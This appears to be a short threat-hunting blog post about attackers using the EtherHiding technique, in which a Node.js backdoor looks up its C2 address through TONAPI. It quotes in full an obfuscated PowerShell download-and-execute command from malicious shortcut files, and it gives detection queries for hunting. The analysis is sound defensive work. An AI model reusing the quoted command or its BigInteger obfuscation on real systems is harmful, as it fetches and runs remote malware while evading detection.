402. Adversaries Keep Actively Using the EtherHiding Technique
Hello everyone!
Threat actors continue to actively use the EtherHiding technique, and today we'll look at another example of it in action.
According to a report by LevelBlue, the attackers distributed malicious shortcut (.LNK) files. Interacting with these shortcuts resulted in the execution of an obfuscated PowerShell command, for example:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd / $bwusN){$JZwuEnBA+=[char]\([int]\($YrXdQd % $bwusN));};iwr $JZwuEnBA -OutFile $env\:TEMP\lFdlPb.ps1 -UseBasicParsing; powershell -ep bypass -File $env\:TEMP\lFdlPb.ps1
Notice that the obfuscation leverages the BigInteger type, which by itself provides an opportunity for hunting:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: *bigint*
The downloaded script is designed to deploy a Node.js backdoor on the compromised system. One of its functions is to retrieve the command-and-control (C2) server address using the EtherHiding technique. In this case, it uses the TONAPI service, for example:
hxxps://tonapi[.]io/v2/blockchain/accounts/0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9/methods/get_domain
This presents yet another detection opportunity:
event_type: "dnsreqwin"
AND
dns_rname: "tonapi.io"
See you soon!

Comments
Post a Comment